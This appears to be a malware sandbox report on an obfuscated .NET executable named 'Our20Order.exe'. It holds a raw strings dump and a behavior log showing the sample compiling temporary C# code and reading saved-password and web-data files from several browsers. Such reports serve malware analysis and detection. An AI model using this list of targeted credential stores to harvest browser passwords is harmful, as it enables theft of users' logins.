tntPulOcKN26N4LdTCD
ComponentSerializationService
Struct6
Struct7
Struct4
Struct5
Struct2
Struct3
Struct0
2=
SafeCancelMibChangeNotify
Ceiling
GetProperty
M|5;
$wh'
,W& x
a~ L
eJJcbHON6Im15HoRTfL
nH3wk
bool_3
bool_2
bool_1
bool_0
bool_6
bool_5
bool_4
1e O
TraceListenerCollection
SchemaElementDecl
-wcA&
cpml3
Z=Aa
/{g:
BB&e&
vZN6aXZ4RsWUyEjgYg9
uKB
#@4u_t
DrawListViewItemEventHandler
m_name
BinaryReader
bu`@
W x
}}@(
set_Key
h+0$
I*9
E/K
2kS{
9l ^H
@2nA(
|^uUC
_gVN*
/2;|n>#L
pI|D
\{Z'
#vlmX
(P
g@vmn
8sxS
/@T-
typemdt
M=X8
(@
KDOQS8ZmIUmKHGruno7
kIUk
ThisAssembly
O4d1.cM
}Yr
D5Cjp
KH7IaXBv9gGmY2CetJ
MethodInfo
IO+
{&{c
R^tfF
pT=Rf
qc{a
Atan
kmXH
ynEE8
CompilationRelaxationsAttribute
&*2(
!|iC
a4*=
ReflectedTypeData
cQwHL
m_isReadOnly compareInfo
}TDC0
$`mSFf
8{I^
3z2K
+2&+E
MemoryStream
:2A2
F4ARcM
TrueSizeScalingType
kXhiIm37gwh0pWwwwq
^(+)
b$1=
P#eu
=<r]
;D7_
L[T[
M"L*
%53[
StreamSizes
ZoXsi
RegexParser
qLwwL
WNEmfLZX8ZrhVRP5SGf
xg7b
AH?9R
o6_6F
ContextMenuStrip
6 xBy
PZQSSY
DfE
EJ'v
H)J _e4
5mZv
M-S:
bR-T
E~JU
X~Mh
vTZCa
R.+1
D5H>By
<kZ|
c:"!
lScdAWOWWhp55fsXyRv
a? |
"(Z
IEND
QuP#
p46 B
E$yo\
L^U$1
tzq#v
N$>6
.%qb
i2a&8
? p1
4A-~L
"+Rx*
{h 0
n8ceRgr21hMEkDEfPq
q6%R[b9
B?@l
;R`u
Kz>JSTye
#ux-
O 6
NE"N
[[pT(
Struct1
uk+
4&ro
_b`*b~
$[:.
[j;U

long_1
long_0
?@M<
long_2
^-6l"
rK!8
Aw*G/
^R@d
ITB1g16BiRvhD3ab6q
+Ud``
}](v
;t^xP
,/h
vH")
k0wBeQvX4LbinIwDGkR
CSharpCodeProvider
v(3B
memberInfo_0
binaryReader_0
"a3/[
double_0
double_1
si7!
^c>9',
rT"?
fyNS
!pF
t7y0
uJl ||
*^
9Q-+
YHHSR
51k#9
L"BPvj
System.Globalization.CultureInfo
W<uaB
SoapArrayInfo
Kqr~
JXZsl2OgEQBpTR5tkOl
CompilerGeneratedAttribute
/7xG
4DqA9
Rb2#Z
nqK
EY><
MarshalDirectiveException
1t&l
92NP4(
Rf368eZ14yjKeiUwIZn
"YUd
:>`Gy
FIV~
e,M0k
!4MC
0]uzTv
Gr0(
s? ~Kt
lPkj
u4#fKI
&P<;
sRGB
Copy
oRKWF
oDh\
>qM?B
System.Text
GetName
tP(9Y
,26v4
d`G|
-+E
97j&
8H"M
-KL8
c\p)
rNXV9=p
L5 N
(<I,
tIim$
{`o/
1no<
flags
2k
,B&
Bl@E
oP'*
5PVD[
[x%e{
HBYbvoZxeds7hra0IpL
System.Globalization.CompareInfo
>Rge$
"rhr
-<!8
k@vPCN
lS/
N)na
]c l#B_
Co0ffF
]c?oB
%(3s
Class9
Class6
Class7
Class4
Class5
Class2
Class3
Class0
Class1
';=!
;NZ*)
{R^M
b 0C
K NL
g&uQ
=Om>
>hv)`\
VBWhHFgpIe5uLNIc3D
$$method0x600002a-1
$$method0x600002a-2
EJHp>~
d/c7
:l,qx
/.$r
uR<G
s[9 w
gEMVPQODy69E853R0PT
;{P3
*L)Rs
SfBx5mvxwZ5iKUQ4bt8
qhRwNgOmCx4nAOQDdX0
0 0
xL_O
f=]f
M|&yc
FKlZd7OHfYrifBCkFRL
w( t
Exit
fXohU
i}D
|uYC
ICbiqdOvBImdNEGlJP8
44l*
!=qTn
IBuiltInPermission
-(+l
[MNQ
%cKT
'it
:`@[
E52Qh
String
t:s!
j{7s|
T&RCj
_CorExeMain
nVM1yrIxsWJcaDGZ.exe
r[+}
.Eq$
*irh
)]#H
%LM|
jODhtUOJDl14dnfSI41
MR30njOjjQUV9BV896p
S(?(
b2MnTUvhBSfCL4NER0H
PropertyStore
.e`N
THJI
t k
G{=u
percentGroupSeparator percentSymbol
DebuggingModes
N6>%-
Cv4LHKvFiKUHrcBLWgA
Z> N?"
InitializeArray
@DTW
<[~A
Fun
(= ]
}Km(WNz
`BC"@
f}0p
11~
Z8\pI
``,2
e}lY
]_m 2
?2v {
?#6w
C#3^
ToArray
ff[w+W
kX:At
'~(/
5kYle
:l s^jz
(mf+n;
9~T\
B)qj
0h&S,I
`uxC#
KdQMf
=#4u
&L {
module_0
lvG5GkdUAFVBgjiX0g
!(k*
CompilerParameters
[BrW
@4WID
@e19Q
&a8E
pD2O
bS]u
<AZE
S50i
1`84
TtJWpocJmU4uaZXjiA
$j +$
F%X]d
info
;@95r
jNbM0
Attribute
nrUGQFM3gp5XbhR24D
1 xHi
rAvkMPj
SX6Z4fEbNQpcsoO8yA
dtFP
[3Cn
HDHqQ
1img
U+zW
,iEX
6mE9
SafeArrayTypeMismatchException
& Vl
'#L?
ei8y5e
BeginInvoke
$ Vw
$k~d
wuPf
a{gW
,V'(
w?-K
DebuggableAttribute
!QaM
R mJa
xTrf
]I?'n
CallingConvention
6GlX
A.vS:
{eP@
hw)L
Reverse
#0<Q_
+t:.7]
>oA7
`4_!
{YS'
ge9L]
| xG
t|?f
4HWkk
T 9+
<2N
5^k^*
Cb_A
RuntimeHelpers
Lj!
ct2h|
methodInfo_0
+K|R
h',#
validForParseAsNumber
FZ_f
(,W?
>ZYT
j]"l^
V1Why4vHlRtZYbrD1hF
g~>Z
[(|D
j9:
pR]_
XhD#
:~a#CS
' XS
^27;
4% t
-s /
&l^(
_r|g
jA b#&F
c+Oz
}c= 1
Object
F$Wj
<],Hk
byte_1
byte_0
byte_3
byte_2
byte_5
" +K
8[MG
?$O@
ComVisibleAttribute
D1?}
\]^z]
(z~L
D(|xP
9 ng
[pH
P7nf
oIgl
!t= t
IOcE
(- {
KA7o1vOYUL8Ce5uVLQq
BisZ
0 ~x|
@$Wd8B
`lj69
,EHO
83eDFZ8
kuFVuVZvKuDmriqbMh5
}T>3
UB9=4&
RaU
%9 K
M=@=R9
OGQAmtZrduEKuwVZRXp
VLA
[_&%
'>;
:EuO
rX<
AssemblyConfigurationAttribute
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
\7r@
\nK)wu
5GL*h
KGos
6?
6.k
l2$i
uxEkbMZBpwlFvSIkDTW
F4A0
T<<o
u,r6
Hashtable
%System.Globalization.NumberFormatInfo"
46qP
$wNc
\B1a
ZcGy
: 8ctt
O~DT,
n3lP
dH_I>
0:#:H
OGqCj9lSPS4qkq7VCP
}yOf
PL;'
DDiA2Vkh
object_0
> q(
woqLz
&I*uM
M\`20$ p
_p<i
DataGridViewCheckBoxCellRenderer
kPQ9xyZMti1AXCBPOfN
Stream
fSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3ajSystem.CodeDom.MemberAttributes, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089mSystem.Globalization.CultureInfo, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089fSystem.Drawing.Size, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
y^o=
}H4X
CEliPMORsrE7a9FAfvS
e~Ka]C+
KEHyO3ZYj3jRYtIYqJT
XmlSerializerImplementation
5rOk
r"M#
JLza
s*
_Z^`
8MnJ_
>>Jz
rEke
B=hA
RE-L
)DB"
`RMcN
tCOV5lOddCx3n9Cf0YM
=$O@
cF!My
F,,,
b tz
FD\p
6 Yh
0)gJ+a3
=7 ),0i
HtT}
_hg!g
6(Y/
F2I?
;(d26$
EJ%>
EQF&
w wP9
LaJG
GJiH
g9uBE3vVb0ZU4P2DIra
("(#n
=e2atqf
6T`_
_'L=
7:)8
M[##
iw{<
r 'E
^z/U
F9vC-Zf
Z#4g
!{?N8
$D[~ h
wx6a
f]uCC
LFeE
"C`E
DomainCompressedStack
*.r
percentDecimalDigits
VOXOPMvGfAFHj1o66Kq
.NET Framework 4
6Qwn
UecOFeZAohcabiOQ07y
S 2N =P
P 2 "
CryptoConfig
R|[?
&+cE
&9OGz
z;?
UIMDpGZamgtix23s5cR
W)6s
9 `1y
+%#
mc l
u%B
Y>j
i\5R
1UiX
e(Fh>D
C,De
6zbV
EXPRBLOCK
kO\P
,G& >l
A[Ks;
9~\eE
KsgTFCZ9JG8Q8Z6plCj
OBJECT_ATTRIBUTES
)Z
QZ^&
% us
sRTFF7881cj1RTdiRx
iZ2VopjJeaeZ54rHtq
ComAwareEventInfo
+t/A
cK #
Ma(p
SIG[
a8%y
fBtm8LZW1ulhmEOLDcw
\)y
924}`
k[ $
C`d4
;D:s
jR`c]
P5VhLrOXm2O0owM1UfF
f S<
*Y/r
AfGEMpVZHgKcdJRSs6
2010
3 kt
~wBi
hG0QcC
s5&62
AesCryptoServiceProvider
currencyDecimalDigits
qvgV
?{%1
eijKq\
41 p
k0?N
clXW
h7EbZHO5GRxUQGPrxfD
OU5eN14TYbfFx8DG2i
e1\6
=@26k
7)LE8t)
nVM1yrIxsWJcaDGZ
lR5VwCvpMnaFCKAqI28
Mk+=
set_IV
/dD=k
33!W/
&+6E
lF$oLj
<O1jB
adCfnSZcF9LYyCMOLTW
BqJ6H
B8xOiSOat7bqKWEMKEa
&+G
1_m6v.2
U\ZhP
g`Y]
OC/?b
B~j97
B,C]#
.`N@
53 ?
\kQY
q ~_2
LE%
s&yPT
E,q-
}k2T
cipherMode_0
HoistedLocals
^^Lv
HRIGI6vq1HeZ6AeYsK4
]_pt
r] F
Class10
Lp.m8B
fBA7
n Yj%
3$whF~
[Sqj
:vv
VZd
AceQualifier
sQ74Yan7tw6MVwgaYC
9oaP
M5AUS0CkunTT7vQH7G
,nhZ[
^S Y
SecurityDocument
. 5*
*8<4$
lqp,
Ssnr
'8/qnR
ll0-
e YG
=R9 +
Q[ebs
E LZ
8DVK
/9I,:
4.y4ZD^I
CreateDecryptor
%c[{
negativeInfinitySymbol
b i y
!OdF
cv3omvZlui8JdB1K5os
4,8Y
+ <
CheckForUpdateCompletedEventArgs
DehIyuOZgUSAJnSyPw3
A*'
XBn9oXvmtENKLsT67f7
A#gd
x/,
&+/&
B_+|
|^C2
Exception
Binn
OjStq8ZTcIQAC3hJnVK
\!2N
<"S+C
d[aE
wQGaXpZbHQptgy1k2NW
&(S
@<^
hB<PE8
b*G2
SessionStateRecord
6[="
Qe>j?N
pBnaclQbOYju
zY~$0`
7%L|a
lap4
maa 3
79GO
sKl9
D8I &
GetTypeFromHandle
IAsyncResult
O=|2~
Y3 c
Z8*
5{b 7
'E{A
ENMkUpvLkN6k2iwVib.jOQDBSblkHe1GjR31l
SymmetricAlgorithm
= 6{e
XsP#>L
V6W0
havk
percentPositivePattern
get_AllowOnlyFipsAlgorithms
DHL+kH^"
S /
M a,~O
ansiCurrencySymbol nanSymbol
OEVqc8fhZloruuiNoS
c\h,9
Tra
#@,97!
F4xj
MsX({
;.wd
:EUN
Slwg
XdCJIBZCe1XHX0LROro
hOdBJDd
G'q0
5kC 0
9]g
n7%y
K\ <
sDnC9lZtpyGounhVZAv
>{?g
y0dv
qc%E
CompilerMarshalOverride
`} }
XlsV0UqnfWrKXe0dgE
CckS
FileAccess
B0/H
L@pQ0V
qhSL
[pS
x[_
dCN65IZzUEfuGv6Wlkh
set_Position
CTNq
Z^>G=
dUBV
\Z2xQ
mAOQl4H0Ps2gKEeFFW
BJ)j
IZ5eD#`
}BY U
System.Runtime.InteropServices
Hncsi5
AyQk
gE(?
BZp|
t-HC
Y;!
Math
51XR,
UnmanagedFunctionPointerAttribute
Psg/
De'r
\<rMUsI
&*^
0]l
Sdm9unOKQ20mfuI1AOV
6.9?kT
}f2i
nhUm
EKbgrhOQbdUgrBQh8rr
RUSUaBOrZWoyQpCjFOR
\bHN
~>h
i
g^ KB
symmetricAlgorithm_0
^dwh
sK%{
HGY,r|
?zA8D
VB.LWG
;h=Y!d
sRaqXtcXvXuGVGub0N
wVCxyavSODhHnBBFhQ9
Z}CP
@:fxx
~v HK
K}t{
diZZNvZH2EeLiE9tamM
@$1w
Zl:=
":-s#
JN18F
F9]SdV~
KoR+E[
Y}Wf
*
0c9d
bM?Ex
&*2(
'}ba+
set_CompilerOptions
|Rc|
U~'d
xH_W- nh1
ObR-
BKfvH4Z2hmTjgYQID9e
TRACE_GUID_INFO
j4 *
PV^D
SrkE
7v"t
f/d Y
}Ayr
RZxZ
M49k
nMIiC
tD$"
@c Q S
nS i
1Dbj$
hgXXAwT3YJtaglSqCR
Xp?
6Cj}
WZC
0##V[P
F^7-
Zd$YR
db )
YEr8lt65n`1
IDisposable
Adr2
;|o.C
&9rX
Exists
xH5QIEgohcacmEXOUD
RO@(
ScrollProperties
currencyGroupSizes
6pRCJ
j(jP|P
set_Mode
TG(v%w
Em_9Ng
cjK
Ci!Vj
f'08
q~rt*
qN+_
~Q`8
/5 9&
AssemblyProductAttribute
AvJal@
\6"n
}Mh1
A&b#'
]^<^
<Mo@
=R9 +
,[.'
@J%H
dJ:+W
b)R<
7/U,
I(J7
MulticastDelegate
U8>0gC.
kj A!
\j!
jrUuJ2JsKpVrf3SLUq
ComputeHash
'hI<
?l=q
uh}i
i17-n
f_Bz
G4w
X-*RkE5
r*-H9
uint_3
uint_2
uint_1
uint_0
uint_7
uint_6
uint_5
uint_4
oaD
)e -
^$;L
~?6j9e
:{\#T
FvT9f
0&hH
a 78
$wB#
:dz\
2vCI
e$CsSic^N\KGkEM
NP.[q
:9An
.Ibk
CreateEncryptor
)9 &T
Yn!3
wG4PRdjS7qFoLTeFi1
`lE9Q
IxI59*
&oI%
nativeEntry
#GUID
SparselyPopulatedArrayAddInfo`1
FKYdmrL7C9ypGweAns
Y,_;
>JCY'
)1{3T
L5[z
}"Fc*W
y8q"a
`w:w
u]vH[
E`y
7<x
{ N|
l=T`
}&y@
Rj2i
!@Gn
*S,U
V& @
@Z
"*u%
=1Bg
percentGroupSizes positiveSign negativeSign
fR35JeZVLmPc573acqD
s kH
@cUCuM
X o|P
t +\l30oXv
\|Y1
EnpiyJ0LY329gLwRHx
AnA$
G^.c
\o![
'c\3
wh$s
TLLXVHOV87x1mh8uqFF
d25X9xD6MHbd8ReYtC
M@ i
Attribute0
Nullable`1
nAzvTFu
wx4r
3n>u
- (A
adVg!OA]8
S{2w
jiY <
^v/Zg
=|jP
ig>
GetPublicKeyToken
QT1q0eZIese5pIMYrLd
System.Globalization.TextInfo
aZ3RovOL6MmiclwYali
Rc7W,
iS@i
#O@0R`
o.3+
&8\M
sBQU
z@7!
PB7~
8#>`}
CodeStatementCollection
sw9bCkOkRq3gSN9uXXP
X +#
jBY"
SetValue
FdnU2
Encoding
;v"M
5jf~AQ
P?Y/
GetFields
&Gl#
w#$9k
X''>d*
calendar m_dataItem cultureID
*{;_
Huwl{
2Bl?
C6Vd92OsZoWd7y1NYCO
X_y =
{ itZ|
LUx+
Y0H7#G6
&+4&
[#+1<(
cMoj
-D&
/qpD3
U3W(K
|}nH
2w/R
AU4OAQkknJkSLdYO3r
+a 2l
+ &+ #
YK9I+
3+4h
|*wt
/ =D
E|'p
7 ,OG#?
(+,5
$9k^D7
B7uk4
D^b%
m _^
_L u#v
&#@,97!
D:W1
>^Ye_9
\ 8:
Replace
Zero
'X2/
w=A(
eD1*
stream_0
{~RdO
?z:
6P{F
Y7bK
Sqrt
'c O
NmtdnYruWnch
;1EY
UvBL
6ImX
kawX
qm!O
`rLJH1
At&~}
Ty\c
Ad D
M-W/
OqMj
v`b<
Mr5tNazf8bDL6bOHWL
) M;
q" fG
E{QMN
dT,A
:=Lc
UakH
hXbd
6i'^
KSZXkMPxWKa5YPscWG
[]]cT
F]9#:
vo-~
hJ8px
s>:<
(XPKm
" "2
S{|u "z
t[gt
cG +
F X]}
i5>
\K?T
UdAC
Qb)2
jQatjYvZvl1GNAPu0bb
s[]0]
#/ f
(F(ig:
zCK
H,oX
: ;F
f5~/B
4 u#G
LGb%/=
E &J
WriteLine
xeMto
S[k:
c_td
y\;r`
customCultureName m_nDataItem
w$q2
?_d
, &
&raM
]R>M2
ybrJB[
, &(
HQ_9
X9 {
-_N#
4r%nT
eo6 "^M
xh
QQT0mbvMZmw3TPx4Wlv
fkSaBxZFYXG09DJAvoi
f-S>
3>>v
:5-
HZEW
nFL`
qA65pwZk0bpDqySOB3R
1k>E2
JR>.
atVf?
C O@
s-cg,
kk#}
BNKO
cL6Hx
Ly$#
@"i^
runtimeFieldHandle_0
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven06_64 Seven06_64 VirtualBox 2018-06-25 21:39:47 2018-06-25 21:43:03 196

15 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven06_64 Seven06_64 VirtualBox 2018-06-25 21:39:47 2018-06-25 21:43:03 196

10 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\Our20Order.exe.config
C:\Users\Seven01\AppData\Local\Temp\Our20Order.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll
\Device\KsecDD
C:\Windows\assembly\NativeImages_v4.0.30319_32\nVM1yrIxsWJcaDGZ\*
C:\Users\Seven01\AppData\Local\Temp\Our20Order.INI
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.tmp
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.0.cs
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.dll
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.out
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.err
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.pdb
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Users\Seven01\AppData\Local\Temp\Our20Order.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\GAC_64
C:\Windows\assembly\GAC_64\mscorlib.resources
C:\Windows\assembly\GAC_32
C:\Windows\assembly\GAC_32\mscorlib.resources
C:\Windows\assembly\GAC_MSIL
C:\Windows\assembly\GAC_MSIL\mscorlib.resources
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\*
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC
C:\Windows\assembly\GAC\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_64
C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_32
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_MSIL
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\System32\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\System.Management.dll
C:\Windows
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Users\Seven01\AppData\Local\Temp\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Users\Seven01\AppData\Local\Temp\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Users\Seven01\AppData\Local\Temp\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Users\Seven01\AppData\Local\Temp\CSC322517D57E1C4C98B6C2462FF1F8FDB.TMP
C:\Users\Seven01\AppData\Local\Temp\RESA661.tmp
C:\Windows\System32\tzres.dll
C:\Program Files\NETGATE\Black Hawk
C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalComodo\Dragon\Login Data
C:\Users\Seven01\AppData\LocalComodo\Dragon\Default\Login Data
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Login Data
C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome\Login Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome\Default\Login Data
C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalNichrome\Login Data
